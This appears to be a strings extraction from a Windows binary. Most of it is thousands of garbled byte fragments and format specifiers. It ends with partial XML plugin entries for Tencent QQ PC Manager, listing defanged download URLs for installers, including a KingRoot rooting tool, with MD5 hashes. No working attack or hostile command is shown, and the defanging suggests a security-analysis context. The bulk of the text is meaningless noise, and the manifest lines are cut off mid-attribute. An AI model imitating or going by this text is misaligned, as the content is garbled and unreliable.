Nx.lt
T>\%s
.Twe0
.RrJp
cRtg
m'Ýz[(s
z.Fhb
%DzUQ
.pxEJY
K%DsY
.ux>G
%DX~)
.YRH%
.NtW6)
^.vm{B
z%s86
.Mmxf
m1cMDdOb
2.FNa
GQ.vL
|.fIi
.Bf0x
{1.LOua
.pn'.i]r
7w%s&WY
>#g%d<
E.hKH
SW.zq@N7
3n.WOq
ioY%x
.oPr^
}[email protected]
o* %d
~.Mim
l s%d
<h.UK
B.Pi@
Eh%X4
<S.qL
m-I}h
yUDp
3.PP;}U
/@%S4
(B"..oz
3`*%XX
L.Zz-n
"14k.lLX
!.BNI
OT.vD
.sn,E
.rT@S
Q4:.vc
gL.cm
D=e.Ea
.EvP\S
E}vR.fzBz
NUÏ7
SUb%C_
.AvCo2
'u5%SK!
}#*.*
T=w%x
JFzcRT~
[I.Yx
Z:\i~J
\.cS~
NCmds
)l%D(
92.Of
.Jka}X
\.Kz3
N.fH\8RZ
.iK>7
0_.Fy
v.lHi{U
%9u]_
.ajPu
lG.Yp
eZ
Kw0
^!J.Ult`9ycP(R
0.qV>
;>[%Dr
.sRd|g
I\.aE
 H6.Ka
6/a%C
~.zb~
mD%C'0
6%d^-
!pw!8%U
y%s_g
F.dZvk
)-=Y*%s
W(S%S
 1u[.HH/Xq
d%xgFY
 --3}
.uv}A
K:%DN
-d}6f
%FN{J]
pslþ
\.edE(
-wTM/%x1Xz
.Pg.^
p|n,%d
v`B4,%Duh
4g_I
.Szb7
(%u9l
-l6}u
z.LT4H
,m<y%u@
?t.sU
:p[%u
.WsgN
`vt.jf
hcÚO
(3$Ñ(
`.Jan
c.sx.
8n.fB
m.Sra}
e>Ü
.VKd.A
vj%CHAeY
.eEYJ
*8@-g} u
%SRWm
G.vV#
%2u[Y
-.iUS
?kEY(
.SqUH
%uy`!
crT^2
i.uZE
IT.Zl
6[J.qRI
%D$VWPw
Gw(ic%c
P%Ur/8
%c=:;
cX,%c
/VÏ
.hwLv
<WM%S
.oaZDC
Eu.ob]
u.EF2
-g.fT
9J[%c
%DpmC
Î@#m5
!;.wdr
URlN
CurLuB
%xa-L
h.ben
.yy J
Iw.KL
Y^ô
L?.RfcB}
L.omNk
%dp%u 5U
6EWt%F
,t.Fq;u
.VQWR
.SV[jq
$.JlA8*b
.MlzW:
.XW;)
B.bnR
.hw)u
M.Njj
Np;%X
t.Fp16
4GVË
.vSrZ
*JH%xR
5s%S(
$\o%x
.Xi|rw
u^.SS>
%F_>C
M%S]s
nÚK
icJ.Sk^
.cPQ73
/k.HF
.serB
%fSP,
hKjc%s<
_%xhL
.hMs1):
%sU@O
d$.yW
y;.RfQO
j.AU*
3n%F$
#*iA%XE
.MjCr
B9%UZd3
}q3.nS],
crTF
p*.uhg;
%c#O_
[GfTPB
"?%x_
w.AzhX
#$.AB#|L
.QQ1|Z<
.al7 
McrT
.YjY>-
:.In^
f%X;R
i.DQ Gj
[9AR@Xg%s
9.xGBCh
t.Jv|
&2.ltVqvc
osB%x^
_A|.fYP
l.lBt
0V.srB
.rUTc
.l.QB
)r.uh
a*S,
r(%xj%
or.yEXjC<
vy%x u
f TcPiM
?e8
.ax7k
0.wqoN
.VX)e
/.xk;G
oqb%U
*.wv/
.cT?3s
g~gB.lp
ZAg|n.jB_
%sP*fQd
k.Be;
Ã&Q
"%D'Fh&,
%F}b[
!.JSg
3N-Z}]
=mH.kS
2 %F`
).Evz
@@SWeB4
O.hY9/
'Y%U6
%s5U7
!.GBT
[v.eD
%Sze_
X.Yf[3
/(=/r%S
f%F}u
0.SM"I
Su%uj
He.Hd 4Y
'.tZiV
m.IFT
&__%x
5.eO;
 M.PS
nzBU.Ya
o\[ÿ
"%SC,
mvL%x
C.Nme 
(iI.Yb
.CZO~
.vPp\
%C%/m`
4c.Mg|
M/r.iy
D.nch
Ci%XDD$
xO_œ
;.MU"
n@K%DI
.xrj^
`.jcAG
'.Ej>
%FZ?O
g5.hfs
%Cz~!a
1M.vk
%x9"K
n/u.aN
10%x>
.llNt$&C
mK%UKN
%c"<D.
T^Á
Q#.Zs
r@,%d
0Dn%C;l
%f%{!k/
Q>.dSZ{w 
Y{`A%Fo
z%d`5
%u2 -
K$.Od
uQ.ng9
v}.Pd
%u1O1J
LuRl
K3.SF2c
%SWMZ
#5H%s^
F.lYEq
ÿJi
e3.pA
s.pzI
oh.ce/&
7pWeb
9.Ivy
%0U FB
u"A%D~
4z%Xh
K#.ApU,
#.LU|f
!n#.LP
.Oc7,
,).de
.&4 , #<2
~.mj{?
X4iS%F
.WUT_-x
%D|6pV
[.QW(G
]7eÔ
e5YH%d
.EgL8
.Tx@d
'%ubf
%SBEh
h.Rcuu
m.ocQT
\.NA(
.pK~h
 .fQ!
fQ%xMIi
V\.HN6
U.YNC
W.bug
g)g%d
.WYEl
.HH|N
=.LhQZu
%DQC#O
.hS}6
V|.tsN
j.%CN
.HH3'
W^OÃ)
Ag5.zv
.iWf|
%s3Tp
.wo1\
^"-p}
yz%X5
hBn[%X
L-.VyN
6'o.pO
V.BJ'
ÛfX
.lW(<
H6c.DmA
?e.WM
-wm}Q{
%XC=H
%Fj~3
mo.qY^
l%Sk3
?Nh%X
>P.MK
pB.bR
- .RK
/b3(6)-G}O
%sYTL
w.mCt
sf.%u
u|%D'
7SX.lX
5O4.EP
<%uxs
qI%F`
<.gN,;:7e
Q:%sN7e
?b%key
mY.-Yf
%UI)&
h}kð
~.DLn
`.ZI*
L%7u:
th.teSX
1#Z.Gv
.HBku
=.inj
e%Srf
{.KDfW
f..FBIH
^e.Jl
.SXQL
-0Vc}!
^Jnz2.NW^
5F%4.YrD
j%c.zi
U%Ct}
.Bh{E
.oK@K
CVLs%D
6D%U'0
.XGjV
:tu.oa;
[)8%d;
m.ria"
dx.XwN
.JM]H
Ò :q
L.JGx
pG.tM%
Eq%C/
U,H%c
CfG%d
~.GMo
S.OU>
%U'a5
.cajC
.FW73
.nIJU
"#.BcI
.Lfdm
(=.Bn
.CD H\
.sM7A
uq.gAc
%Co">
d0$.mp
56D%X
1.fLD
:h.gb
W.jR&
.bIX= _
t].qW
#.ohZF_
0w{S%D
$..oy
V.jqu?
*`V%0s
Bcj
O%S(W
%1sC7
]{.Tz
D$[9%X;
W.yN=
%CLuB
R.PC#
P.XHR
.OouD
%DwU6qw
)(VG%S
(.jbd
A.wV3C
%9u#9
.Mc*nq
zZÞ
.Iv M
i|%S4
%Cu7w
y]`yÿog
f#4: y%f
.kGj z*
%u2~$
R*T%D
pb.ky
%R.TT
Y%cqo|
M.Sxf
.ciB1
f.Oo}d<
~].YBt"
g.ycD
j%sP/
w%DnA%
%S.9\
Lq:}?t.PF
oU-.re{
%uX'U
:0/.YQOx
@.pKi
.FFQ.
.Rvc=
.TM}3/D
A?.NvGP
5t.tE
-_REXEh
io$%c
[email protected]
3{n.wo
T6.Sh
.Mx<m
%SJ$cuUX7G/\
{Q%Cs0_
{>.Qh
w#;%x
-oAKD}FB
W_-RL}
F1%c.|
%X}`.^L
%fPT<_
.ofPnh
CE2%S
)$#,!? @
ki.Se
|&.wO8
6LV%d
8|B%F>
_U.mNL
w.sj(
o;cS%S
z-.jg
).gSy
.qX(4'
.SD<7
AftCPA
S%X~==
[9k.eD
.Qt_,
%.eRB
52.%u6
i)S /.rG
A=%CG
as)ouœ
{%x#/D
>.umi
'N.bD}
.zOc|r
9,.uO
%f-1|
.gHj|=-O
%SFXG
.HC*m
#.eSf
c9z%s
kWEB
j%xRK
}v.nR
].KKY
}Z6_?-.ukN
5;h.cT
.kJD@
5 #%f
:N%sx#
 y3.tL
=N.SE
e6l%d
%.daB
}X.qiE
Q9.ZU
.Cr&^
?%Xh&
g).oh
_.xuN
BTL2.Va
T.yEt
[<.mi
 C.nM
rC%duj
!.fOv
S-hNX}
Z.Ah)
JM.JH6Yw
&V{M%U2oc
e.AQq
.SHWn
G8.dJ(x
/>.hF
8-0KO}
.suZZe
D%1xh
Uc%uI#9R
$N.DW
%s,Zd~
V.VU!
)m.bP#_
,K.wj
R!-G}
K.DsA
%2x}m
9.wII
.xXZ!
V~%S*
D.i.wK
fd e.xK
;S.BDsj
.yTAXRi
t0.wq
7P5.iQ
@8.CrF.Wf
K%u7[Y
l.JJG
xZs$%UQMP(
it!ó
ec-ps}
-4}##
m=-M}w
.XoF]
G.IQ&k
.ASL~C,
},%uz
&In%c
YuV%FQ
3O&%d
.ojD~
[email protected]
.Jc0q
%U;1ka8
$%U,4^
cQ[%x
H)%XN
Y3[l.ZS8`&;Z 9p
@~..de
.Qt -
:>.aj
.zQDd
2F$%X
.MOv&.m|
<%8xm
.rBBG
YXcMdv
&Z.zz
C>.OR
V7|x d.aO
u%szD
EIv%s
.xz&h
*H.dJ
.AZJ-F
GJS.QJz
õA^
y1R^.iI
C{.fWh
 .PoQ~
.JmdZD
.hZ"%
S4.Uf
e!%7s
 f#%F
%UJMZ
v?.ra-
P5.qB
%F%<F'
K.QMiJ
.Uu#c
d%cm>i
j>.yyWG~
p&.gN>}D
.WERx
=V.SR
JI-w%u
d.ay[
.Pu3k
^QG%U
,.Fy[s
^q.qn
1%X:{
%Xy7,
Gsqll
ftCP
%S.8"
I:n`.aM(S
.Gry=
A%dsY
N~.Sp
Cs\.AM
q.TGV
a.%C"
e%X4y
8iF
mG%DJ,XE
W:[%c
^h.lI
.ihq'7
PE.gV
%ClsH
l.oPN
Iel.Zh
 O%Di
g_S%D
=)S
w4Z.uE
5.ftH
.kKY7
R.wmb
/of%DQ
Fo-.nr
H.PQ(
4.yFK
kZ?*%C
)J%dH
*%S0)
.AQO2
.Ibn=
F%f-B
t.oOp
M*%F$2Do
|>.lT
$.HoY
h.fIr
%SAPn
%F?_d[t
h.uC'/xYH
@h*t*%D
8S%D?
E2TCP
.XOzD
.uIS%
%fzd*
uxdzf.YU
q.JzN
YBñ.[
n4n.GV
.RIA=
Y.YBM
@u|.Yn
<.pC^m
.srN}
A:.eC/
.oe"'
KEyV
~v%Um
y.rAf{
O]%dz
Q.jPt
I.Mk#
=.DZ&o
.eyK}
-2}]R
0"?9 0{1
-.nFu
I-t},
crtBI
.qa>m
;ULp<Jyh.sUn
)CnûP
%0X[?@
N|J%S
.eKZ[3|
y|.wsw
M.FkvW
]%FyF5k
NM}.yY&d
=.xWf;%W;v
K}.Yn
Of.fc
Y_b.jg
\Cm/
D.IQ:
%.Rf}
#d.bKUP
I`%Sh
.fpj(
wEo\`%F
c%u7~
B{.ff
/.TF!
S%f<q]
G_\j"
:y.vW5
a.yow^
W-gx}V
@v`5Q%x
3.DHI
}.LpS
Jo.GI*
.FVaa
z4.So3
5g6%f
vk.Lf
sy.mr1
2l.ZO
u.vrK<
.KOEwl
.mcLl
?.XA2Y;
l~HwU%u
.ShF~e
w.NGW
w<R$Xr%cP
:O %d
m.ZhHb
.sG3A
P*.Dl
%.jGP
O-g}|
In.qd
%S1t<
.rHD,
ex%Xb
].VV#
.GsJc
9e%se
Ju%xvNT
.vs8K
)-.BK
x.Mr69
%d#NY
(l.gE
A.qLG
%8S0@?N^9
|t.Bn*"NlS
?78%S
e{.rZ
0>.dS
.LjUyl
u%SFT
vm.EM
%}.Fz ~v
FTpF]
%uA4%
P.NySe
.Dw[Q
.YYJ#6
;V%u#
.HqW0`>~>@
.UK0&
e%drc
%U)PQ 
3zk.glXK
O&KA.Je
^j.rq
%xY9)3
%cHwY
M.KT!
Q%uz,
W=.wf
.IN/gJ
,k%7u>8
%SDZ_
AW%u7
UZ.AT
p1C^.Bs
[&L.Zp
.Fg&H
?T.Ho
#.sa 
Z7W.XM
GXC.NJ
-vy}\N
QtsZ%x
.boWk
4C%6sE
%s(l@
.WU'&
bf.QJ
r.eB}u;
w#%Sx
[.DE^
g .vo
)-B3}
j.ZI\
oK"
iz.LZ
.It]B"
%XUaH
%.eVW
.Ff6bp
pBOr%4SO
>g%Fh
.UNB[p
.husL
uDP=-
%.ZXu
.Qz8n
}i%Ch>'
1.Bev
.xiS)
A.alQ
b%U?Py
.ZyfC
.jfj&$
H.Tpa
%FPMPb
eU.dhB
<V-pR0N}
zSi.Ek
eFn%x
J.EM*
2%u.$
5.rTV
E.NR(
%sm=?
]0X%S
Co.ubSN
U.aY4r
8.iV>
ß]n
FN0{%.VL
uS?-9}
ht-z9}OH
r0$.JL
5%d"_53
?.ybPS-
qi.gzM,
%Ua"J
J^.Mx
O.UCX
eB%.XY
E~.oh
>>F%Cx
.au'P
f.jp.g
%uh ow
qS.dJJ
%6XoN
eþ-
Oû5
.QVDogD
PL=
.snIx^#E
G8.QF
.Uo_K
d.oX=
l.aX'p
%d$.e
E.xWA
C%uq!
-cOaA}
.qa3p
^%UKm}
O.lpR
? W(%X
|Rg.Fz
C.Ym._'
:wJ/.lHV
P5.oY:
6ci7-q7}
.fq(F^qra
}<n8.jE
-Zsgh}
8:Uk.VO?0
.tAs@
T.bjv
%u=9\DI4
I%S* k
<'y%sE
,_p.lKD=~D
go.Ak
UL 3_y|Ù@
X%xE|
q.Wvx
 Y.nf
.eKU2
#/r.XG
d%u_LK
0.rd@
Z.ZS7U
bZF%D`
.GMPz/b-i
C.vQs^/
.GB;E
.boDb
a%FqI
.ZQ?P
UcktI.xz
-\GK%SW
.ph:O
%sz#&
R[A%CI
%xWba*4
%;h%d
Yi-G}
0.Uy7
O.xb3bEJ
gm9t.lj
FE?%F
n\c.Ow9
_.wqh
%UBJ0
K.Eg1b
Z-.Dq*
6i5s^.HT
.jdF'
2)~{-v}C
-.WRP
A3.rX6
ÜD/H
INa.XQ
%di.M
%CQtd*"gG
jYWQ%C
'cmD_
H0%2SD
CJ<
S%Sm)
R%fI@Y
DÇ0
dv_%F
2-.BR
e%S&W
.Jl^S
~y.VFw
.jfW2
%D~o~
%uMjx
Df.xL_y
ERtCP
.FBwQ
NK%Fz
zE.Ÿ
.tw|'
V".CH
%DK8_
@R%f*
"%XTa
Q ;zV.Dh7
?rEL%Dg
&E%Fwa_
#{r.jQ
&)%s!
.oO'h
.ddRy^
\"a%D
ai.nt
1xs%D
Rf.vE
gBb.XT
%Xjz~
kS.le
Vp%sG
'k.ZVgL
.Qk_}
p.Dgm
B.huw
 U.uD"
9m&B
vbkEy@
.gAB)
%.YP|
"{Nßy
.Dt&Q(
Vq%XOt
.irgi
kEyrj
=~ -2}
L:\.&\
S.WD_`
~_36-p
.Lj]6Dt
,]n%s;
]8jn%C
u.oyU\
.kI#o
%.hQoX
").uZ
P^!.gZ$
%sG3ZO
%s _|
R%.Sc
<Î>-
|%fXl(rN/
.yDAg
i}.uk
b.rcE
.gqbv}
.gl&B
e.AlE
%f)CA
\@%x)
%G.UF
k%SKf](
N$.yf
khp.Dj
=i.LW
q^!.eK
p.GF-:7
Cy]%s
7}.ac
y|6%UYLQ
.LdhK
;C.Ax
av1.PeL
.EW|j
TB@%x
0%sKX&
bm.ym
~_Mst%c
W="N u.Ej
K%D",
w.gEw
.zGR?
g%fID
xo%C#
.AkAy
!.Iam
.nRBu
s;!.qV
[.Ie-
cV2%c
Ia.Fuh%zo
30.wL
~D.Oy
.LmG_a
.xWZ^x
.VFS*D1^3
cp8%c
o.di1,
rR%u\3
1%U{e0
SQ.ti}e
.Kd3Y
(<%fuk
#s.BpD
CLm)%u
c.Xbv
9.%s,
.bQ|O
Ed%2sZ
1.Bid
G.Qk?
be%1u
HV<.rWN
nMSG
.sZ09
ynho
.wez&9 
}c.ga
.VRoq'i
jJ%XB
%d`/$>U
?`Þ
Ui%Dz
;%u2e
%S(&C
~.YsVZ"_vy
.vn6q
.sZrkJ6C
.Oprf
G.Md1
%-5}x
k*m).zhL
l.sT$Z%
1E2.Pp
hv.HX]
)e-f}
"M:%C
#.sd?
7!.Yd<pB:
:7.LE
.suLc
.CJkWh
x1.zr
qlX6`%U
~#zXmC.YX"/
~.sQ$&
Aan%fY
'cÉ
9A%d$
.PO1q
.dDK=
[t%SX
Yb%uw
YU.nP
:.Qf"
z1.aT
.YBJ?
-3}mX
-z.Er
-kq7}
b:\q9i
G=.mY
=.gW{|kB
u]5.Hre07
]C`%f
/.IQ,
YSqlT
%c'iH
':.sUK
$.hNB
'wEb5
.DGt=o
G@-H}
s.eCe
B|u<$%x^
sd.el
.WjDk-:
aJ.gB*t]2
\.CC9C
G.nU/
`%XDV
11.nz
8y%Dk
9%CJd1
@.yS%
.hh^:
%Uy[(0
.pl,?
%uPg'
s%x-~
%1S5b'-
d;%Us
%XJ1r
@.DN1
_.hh^E,
$.Ph=
h*.UD
R.Ru*
P.Op"
>.Lw:
WeXE 
.LGL:
}z%Xf,
~9 _%U
p?FG%u
=3d.rfZ3e;1y
N~.kn
sAs%s'
X.LV%'
Kn%uE
q[f%D
\@3r%S?
c/.uA
.sYd=
9ut.yj
%u^\!
'iÄ
.Yz9N
H:*.mR
Sdi%S
IO7%x
Esp%X
.GtO17
8.cxu
sp.vyn
%xfmkQ
~n?%Dk
E9%XW
hn.Xy
R-rN}=^A
û-/FK
O.Sfn
Y>l.vr
%F"MR
r %Xzu
@/U%f
.hKrCm
?G%SE$
<.;%U
{^.El
6lW,.eV(
.lOsg
d.iaA
}e|}!3%F
[.Um-
6g.gn
oD.DAp!8
];.Pm
%x6lj 
.BTX<
%X@/%
.QPN<J
.ja"]
i.NA}
/ %d^
%Ch7n
4)B.Fe
HY.IXF
.WPA73
[A.DH!
tr?--0}
sQlxg
lHT.WdG
F_Q%f
.CuG;
J).QH
c%fQI
A.Dz,y
<XSQL
'.KvSIx
b%Cp&
.lLA?
IC.Ifl
.LQPt
Q 5:.ll
zB.Kn
1R%CX
\L.lO
.Hv$~
zjExe\${Z
Yp/5%S
@Ê#5
}%.RX
[i:.vn
.uXJ[
k.JP[u
J-=~%D
C}Í
b1%UO
.HeC9,Z
].YV7
.aX$=Ii>Q
f9.Jx_
oPGG.Fu
p.Mr1
XX%FXV
d:.Zh
NB_%x
;.Uk1
'y.IH
`*.gW8
h.Uxp\
.ra,]
&cq%D
).MfY
@.qU#
kHY.Oq
8.Wm4
.iZfE
H.Ry6
F.ma0
~Z4.iO
/h<7%d
.lop4I
#.CTe
0,.Xs
z%f~E
?2.wB
%F*Zi
42$.mg
/9$3`!?~
i:\M$
uo:z!%%f
Y.Bo*i
%7x@O
D.DZ6
.%SY =
(1v%f M*
`*fTP
.oj[)
-.el$
%u'r]m&
M .SI
qp%uF
,/c%x
R??%C
7EK.RQ
a.KX#
i..Wj
5#E%f
7@SnZ%u4 G
6.a%u
*HeE_MS.zDs
P.QT?p
kg%X&
.yZMC
X.aY`
j.mlA
Y.aH~!.E
kav?.sF
{-a%s
7%UdDDe
2?.SG
Ãgj
%œf
gOV%D
< $3.tu
79W%fw
.oCe6
$W.rG?
Oy).cHV
]6z%u
.SLuke
P.kQFP
2o|.cbx
n%cQvQm$
nV.xFA
%5xE,
jp.fL
gÜ;/
.wOEB
Wò]
.jR.7
{6H.Gf`
.GVYdh~
L%SVW`
I%CIm
?\!%F
N.Uhp
as6.eS
[b.uc)
.Sw_NQZ2
iV.Pz,
.Qa2Y
;=.re]
ssHVL
.Hs[[
rl%cu
[H.aQ
Y%5S2
[.hTL
'x.Zd
f.APy
n\CmD
I}Q.xp
H.xYN
yTCp
~LV%F
Z}.zr
-1}vgC
:v.ZP
:.IU )
T"%Ua/
B_K?%D
r.jDS
h@%cK
.Fv 6
B%xy^
<plugin version="2.337.260" id="40" supportSys="0000101010" rId="36" isPreDownload="0" ShowIndex="40.7" name="
<icon path="hXXp://s.pc.qq.com/pcmgr/plugin/SXSafe80.png"/>
<url path="hXXp://dlied6.qq.com/invc/xfspeed/plugin/QMBJSXSetup_11.4.17339.217_2138318044.exe" md5="4de615f64d475da64e98e401851a8885"/>
<description url=""/>
<plugin version="4.9.1" id="16" supportSys="111010" rId="28" isPreDownload="0" ShowIndex="40.2" name="
<icon path="hXXp://s.pc.qq.com/pcmgr/plugin/QQPCWifiSafe80.png"/>
<url path="hXXp://dlied6.qq.com/invc/xfspeed/plugin/QMBJSetup_11.4.17339.217_24415872.exe" md5="72efc07e5e7f0f88970719952728694a"/>
<plugin version="3.7.0" id="39" supportSys="" rId="39" isPreDownload="0" ShowIndex="30.55" name="DNS
<icon path="hXXp://s.pc.qq.com/pcmgr/plugin/QMDnsPlugin80.png"/>
<url path="hXXp://dlied6.qq.com/invc/xfspeed/plugin/QMQMDnsSetup_11.4.17339.217_28552842.exe" md5="fd9189174a65da233cc139c87be301d1"/>
<plugin version="3.3.0" id="3" supportSys="110011" rId="22" isPreDownload="0" ShowIndex="40.7" name="
<icon path="hXXp://s.pc.qq.com/pcmgr/plugin/TPKPlugin80.png"/>
<url path="hXXp://dlied6.qq.com/invc/xfspeed/plugin/TrojanKillForQM3.3_137350748515988.exe" md5="4dfb6e591780e344a0296677f77ccaa5"/>
<plugin version="2.2.105" id="9" supportSys="" rId="5" isPreDownload="0" ShowIndex="40.3" name="QQ
<icon path="hXXp://s.pc.qq.com/pcmgr/plugin/QQSafe80.png"/>
<url path="hXXp://dlied6.qq.com/invc/xfspeed/plugin/QMSystemSetup_11.4.17339.217_256814941.exe" md5="00d43e6f1455b0310580047f0b891e59"/>
<plugin version="5.1.1" id="18" supportSys="111010" rId="29" isPreDownload="0" ShowIndex="40.4" name="ARP
<icon path="hXXp://s.pc.qq.com/pcmgr/plugin/ArpMgr80.png"/>
<plugin version="1.42.204" id="37" supportSys="" rId="19" isPreDownload="1" isPreInstall="1" ShowIndex="60.1" name="
<icon path="hXXp://s.pc.qq.com/pcmgr/plugin/ICON_139632457655428.png"/>
<url path="hXXp://dlied6.qq.com/invc/xfspeed/plugin/QQPhoneManager-5.5.1_710201.4892.pa.exe" md5="5e115210b050a617d2eed3c806d8e552"/>
<plugin version="1.42.204" id="38" supportSys="" rId="21" isPreDownload="1" isPreInstall="0" ShowIndex="60.9" name="
<plugin version="2.2.105" id="11" supportSys="00111111" rId="4" isPreDownload="0" ShowIndex="20.5" name="
<icon path="hXXp://s.pc.qq.com/pcmgr/plugin/DefaultMgr80.png"/>
<url path="hXXp://dlied6.qq.com/invc/xfspeed/plugin/QMIESetup_11.4.17339.217_2806825679.exe" md5="0b376a2cf331dcb5b7c6801dd7984112"/>
<plugin version="2.0.0" id="50" supportSys="" rId="20" isPreDownload="0" ShowIndex="60.6" name="
<icon path="hXXp://imgcache.qq.com/vipstyle/nr/box/img/act/weiyun_pc_20130710.png"/>
<url path="hXXp://dlied6.qq.com/invc/xfspeed/plugin/WeiyunInstall_Beta_5_3.2.0.1496_20160216_150659_r26502_2370928081.exe" md5="3847a5c83eda829a4085532f495b4f7f"/>
<plugin version="3.4.104" id="1" supportSys="" rId="13" isPreDownload="0" ShowIndex="60.5" name="
<icon path="hXXp://s.pc.qq.com/pcmgr/plugin/MenuManager80.png"/>
<plugin version="2.2.105" id="13" supportSys="" rId="15" isPreDownload="0" ShowIndex="102.0" name="
<icon path="hXXp://dldir2.qq.com/invc/qqpcmgr/tools/AntiVirus.png"/>
<plugin version="3.11.106" id="6" supportSys="" rId="31" isPreDownload="0" ShowIndex="60.2" name="
<icon path="hXXp://s.pc.qq.com/pcmgr/plugin/HWPlugin80.png"/>
<url path="hXXp://dlied6.qq.com/invc/xfspeed/plugin/QMHardwareSetup_11.4.17339.217_687910849.exe" md5="104d7abefb5dcf8c2d8dfd2890e632a0"/>
<plugin version="4.10.0" id="7" supportSys="" rId="11" isPreDownload="1" ShowIndex="60.4" name="
<icon path="hXXp://s.pc.qq.com/pcmgr/plugin/FileSmash80.png"/>
<plugin version="2.2.0" id="19" supportSys="" rId="902" isPreDownload="0" ShowIndex="20.7" name="Q
<icon path="hXXp://s.pc.qq.com/pcmgr/plugin/QBoxJump80.png"/>
<url path="hXXp://dlied6.qq.com/invc/xfspeed/plugin/QMQBoxSetup_8.5.10234.223_138131424879996.exe" md5="e9f06df6e7ba8f45e2220787fe316698"/>
<plugin version="3.8.0" id="20" supportSys="" rId="17" isPreDownload="0" ShowIndex="60.3" name="
<icon path="hXXp://s.pc.qq.com/pcmgr/plugin/HealthAssist80.png"/>
<plugin version="2.2.105" id="17" supportSys="" rId="14" isPreDownload="0" ShowIndex="107.0" name="
<icon path="hXXp://dldir2.qq.com/invc/qqpcmgr/tools/InstAssist.png"/>
<url path="hXXp://dlied6.qq.com/invc/xfspeed/plugin/QMSoftwareSetup_11.4.17339.217_98672130.exe" md5="c4b5872fd82b755a0af134cfd760f0f2"/>
<plugin version="2.2.105" id="12" supportSys="" rId="18" isPreDownload="0" ShowIndex="110.0" name="
<icon path="hXXp://s.pc.qq.com/pcmgr/plugin/wgrepair180.png"/>
<plugin version="3.5.105" id="10" supportSys="" rId="3" isPreDownload="0" ShowIndex="70.4" name="
<icon path="hXXp://s.pc.qq.com/pcmgr/plugin/SoftMove80.png"/>
<plugin version="1.1.112" id="5" supportSys="" rId="901" isPreDownload="0" ShowIndex="113.0" name="iPhone
<icon path="hXXp://softfile.3g.qq.com:8080/msoft/itools/iTools_QQ.png"/>
<url path="hXXp://softfile.3g.qq.com:8080/msoft/itools/QQPCB1IosJmp_1_1_112_1.qpk" md5="F387DF34FED80CB67185C90DDA198166"/>
<plugin version="1.1.1" id="2" supportSys="" rId="900" isPreDownload="0" ShowIndex="115.0" name="QQ
<icon path="hXXp://113.108.81.28/invc/client_test/QQMobileMgr.png"/>
<url path="hXXp://113.108.81.28/invc/client_test/QQMobileMgr_Setup_1.1.8.201.exe" md5="e32f9fb2fb69f7ff3a399c497dbc2021"/>
<plugin version="2.3.1" id="51" supportSys="00111111" rId="40" isPreDownload="1" ShowIndex="41.4" name="
<url path="hXXp://dlied6.qq.com/invc/xfspeed/plugin/QMBlueScreenFixSetup_11.4.17339.217_2191325346.exe" md5="b0054c61c0b4e7cd1c16a07c54140d80"/>
<plugin version="2.1.1" id="8" supportSys="" rId="16" isPreDownload="0" ShowIndex="104.0" name="
<icon path="hXXp://s.pc.qq.com/pcmgr/plugin/FileSafe80.png"/>
<plugin version="2.1.105" id="14" supportSys="111010" rId="23" isPreDownload="0" ShowIndex="101.0" name="
<icon path="hXXp://s.pc.qq.com/pcmgr/plugin/QMSageBox80.png"/>
<plugin version="3.5.1" id="15" supportSys="" rId="32" isPreDownload="0" ShowIndex="60.7" name="
<icon path="hXXp://s.pc.qq.com/pcmgr/plugin/RemoteAssistance80.png"/>
<plugin version="3.2.192" id="260" supportSys="" rId="54" isPreDownload="0" ShowIndex="30.2" name="
<icon path="hXXp://s.pc.qq.com/pcmgr/plugin/wifigx_138597665220902.png"/>
<url path="hXXp://dlied6.qq.com/invc/xfspeed/plugin/WIFIGXJL3.2.192_sing_272110219.exe" md5="140ce1d9c47be17070df75c9508540f9"/>
<plugin version="2.4.0" id="264" supportSys="0011111111" rId="37" isPreDownload="0" ShowIndex="70.3" name="
<icon path="hXXp://s.pc.qq.com/pcmgr/plugin/QQPCLaunch80.png"/>
<url path="hXXp://dlied6.qq.com/invc/xfspeed/plugin/QMSoftwareMgrSetup_11.4.17339.217_2973714666.exe" md5="5057953c2b99caf551173630924db0ce"/>
<plugin version="2.5.128" id="261" supportSys="" rId="56" isPreDownload="0" ShowIndex="40.8" name="
<icon path="hXXp://s.pc.qq.com/pcmgr/plugin/wechatbackup_139331659491288.png"/>
<url path="hXXp://dlied6.qq.com/invc/xfspeed/plugin/QMWechatBackupSetup_11.4.17339.217_2490113542.exe" md5="45183ce88f648c6b3fc0f7ff86e6bd22"/>
<plugin version="1.1.0" id="267" supportSys="" rId="61" isPreDownload="0" ShowIndex="60.8" name="KingRoot" catalog="6" appname="KingRoot" recommended="0" disabled="0" forceinstall="0" forceupdate="0" installprompt="0" updateprompt="0">
<icon path="hXXp://s.pc.qq.com/pcmgr/plugin/QMRouterMgr80.png"/>
<url path="hXXp://dlied6.qq.com/invc/xfspeed/plugin/KingRootSetupForPcMgr_Signed_105032_2_165374698.exe" md5="2538ea0d7e65de9c9a16cec03d2195ea"/>
<plugin version="3.0.4" id="266" supportSys="" rId="57" isPreDownload="0" ShowIndex="42.1" name="
<url path="hXXp://dlied6.qq.com/invc/xfspeed/qqpcmgr/clinic/pe/QMDTLSDKSetup20141114.exe" md5="c10bad831febd394ea7e7eaa99ab1222"/>
<plugin version="1.0.0" id="268" supportSys="" rId="63" isPreDownload="0" isPreInstall="0" ShowIndex="60.65" name="
" catalog="6" appname="PhotoCraftPlugin" recommended="0" disabled="0" forceinstall="0" forceupdate="0" installprompt="0" updateprompt="0">
<url path="hXXp://dlied6.qq.com/invc/xfspeed/plugin/PCMgr_Album_Setup_7_129089279.exe" md5="f4ce8114da27554dd093420beb10b8cb"/>
<plugin version="3.1.0" id="273" supportSys="1111111111" rId="73" isPreDownload="0" isPreInstall="0" ShowIndex="72" name="Win10
<url path="hXXp://dlied6.qq.com/invc/xfspeed/plugin/QMWin10TipsSetup_11.4.17339.217_3160924056.exe" md5="97db77762841be13ca4feb5495399b1a"/>
Windows 10]]>
<plugin version="1.4" id="27" supportSys="" rId="70" isPreDownload="0" ShowIndex="50.0" name="
<!--plugin version="1.0" id="27" supportSys="" rId="70" isPreDownload="0" ShowIndex="10.0" name="
<plugin version="2.0.0" id="269" supportSys="" rId="75" isPreDownload="0" isPreInstall="0" ShowIndex="10" name="
<url path="hXXp://dlied6.qq.com/invc/xfspeed/plugin/QQGameWorldSetup_885410942.exe" md5="b57338e4527bc96df42ff54c73d1a2aa"/>
<plugin version="1.6.0" id="274" supportSys="" rId="74" isPreDownload="0" ShowIndex="40.90" name="
<url path="hXXp://dlied6.qq.com/invc/xfspeed/qqpcmgr/other/AppMarketSetup_1_0_534_123.exe" md5="8D310E4FFD414E9373E78B234C7FD7A0"/>
hXXp://sf.symcb.com/sf.crl0a
